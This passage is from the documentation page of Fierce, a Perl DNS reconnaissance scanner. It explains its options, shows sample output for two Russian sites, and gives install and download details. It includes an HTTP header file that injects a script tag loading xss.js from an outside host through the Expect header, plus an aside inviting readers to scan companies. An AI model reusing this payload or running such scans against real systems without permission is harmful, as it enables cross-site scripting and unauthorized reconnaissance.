| 14 | | <p>Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.</p> |
| 15 | | |
| 16 | | <p>I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. However it does reduce false positives.</p> |
| 17 | | |
| 18 | | <p>Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:</p> |
| 19 | | |
| 20 | | <p><b>perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts</b></p> |
| 21 | | |
| 22 | | <p>I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.</p> |
| 23 | | |
| 24 | | <p><b>perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com</b></p> |
| 25 | | |
| 26 | | <p>As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.</p> |
| 27 | | |
| 28 | | <p><b>perl fierce.pl -dns example.com -wide -file output.txt</b></p> |
| 29 | | |
| 30 | | <p>Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already ran this without the connect scan turned on.</p> |
| 31 | | |
| 32 | | <p><b>perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt</b></p> |
| 33 | | |
| 34 | | <p>Here's what a sample header file might look like. The sample file below is attempting to exploit the <A HREF="http://ha.ckers.org/blog/20060731/expect-header-injection-via-flash/">Expect cross site scripting vulnerability</A>:</p> |
| 35 | | |
| 36 | | <p><textarea cols=55 rows=3>GET / HTTP/1.0 |
| 37 | | User-Agent: Mozilla/5.0 |
| 38 | | Host: |
| 39 | | Expect: <script src=http://ha.ckers.org/xss.js></script></textarea></p> |
| 40 | | |
| 41 | | <p>Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention has to do with a certain non-obvious naming convention or uses another language, etc.</p> |
| 42 | | |
| 43 | | <p><b>perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt</b></p> |
| 44 | | |
| 45 | | <p>Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for it's mobile.mail.ru than it does for the rest of the site. That would have been very difficult to locate with any other scanner. In the rambler.ru example you can see the RFC1918 space 10.* pop up:</p> |
| 46 | | |
| 47 | | <p> |
| 48 | | <UL> |
| 49 | | <LI><A HREF="http://ha.ckers.org/fierce/mail.ru">mail.ru</A> - 418 entries and 303 hostnames found. |
| 50 | | <LI><A HREF="http://ha.ckers.org/fierce/rambler.ru">rambler.ru</A> - 472 entries and 458 hostnames found. |
| 51 | | </UL> |
| 52 | | </p> |
| 53 | | |
| 54 | | <p>Trust me, we've found far more interesting sites than these two in our tests, but I don't want to disparage any companies for their mistakes. I'm sure you can think of a few companies to test this against. The results can be pretty amazing. If you don't get many results, that could be one of three things, 1) you aren't scanning their corporate domain, you are only scanning their external domain which they only have one or two machines on 2) it's a very small company or 3) you typo'd the domain name (I haven't built any checks to make sure the domain you entered is valid).</p> |
| 55 | | |
| 56 | | <p>Requirements: This is a PERL program requiring the PERL interpreter with the modules <A HREF="http://www.net-dns.org/">Net::DNS</A> and <A HREF="http://perldoc.perl.org/Net/hostent.html">Net::hostent</A>. You can install modules using CPAN:</p> |
| 57 | | |
| 58 | | <p><blockquote>perl -MCPAN -e 'install Net::DNS'<br> |
| 59 | | perl -MCPAN -e 'install Net::hostent'</blockquote></p> |
| 60 | | |
| 61 | | <p><IMG SRC="http://ha.ckers.org/images/microsoft_icon.gif" align="left" width="50" height="50"><b>Windows users</b>: You can use Fierce under Windows if you use <A HREF="http://www.cygwin.com/">Cygwin</A> with PERL and the above two modules installed. I have not tested this using ActivePerl in Windows, so I would recommend Cygwin until ActivePerl can be thoroughly tested. I am/was working on a win32 version of Fierce, but have put the project on hold. If anyone is interested in picking up where I left off, drop <A HREF="http://ha.ckers.org/blog/about/">me</A> a line.</p> |
| 62 | | |
| 63 | | <p>Version: Fierce is currently at version 1.0.3 - 03/23/2008</p> |
| 64 | | |
| 65 | | <p>Download: <A HREF="http://ha.ckers.org/fierce/fierce.pl">fierce.pl</A></p> |
| 66 | | |
| 67 | | <p>Download: <A HREF="http://ha.ckers.org/fierce/hosts.txt">hosts.txt</A></p> |
| 68 | | |
| 69 | | <p>(Thanks to Robert E Lee for the help with this and to Michael Thumann's <A HREF="http://www.ernw.de/en/eng_security_tools.html">DNSDigger</A> wordlist).</p> |
| 70 | | |
| 71 | | <p>Getting started: <B>perl fierce.pl -help</B></p> |
| 72 | | |
| 73 | | <p>This may have some bugs in it. Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a pre-cursor to <A HREF="http://insecure.org/nmap/">nmap</A>, <A HREF="http://www.unicornscan.org/">unicornscan</A> or <A HREF="http://www.nessus.org/">nessus</A> as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.</p> |
| 74 | | |
| | 13 | Requirements: This is a Perl program requiring the Perl interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN: |
| | 14 | {{{ |
| | 15 | perl -MCPAN -e 'install Net::DNS' |
| | 16 | perl -MCPAN -e 'install Net::hostent' |
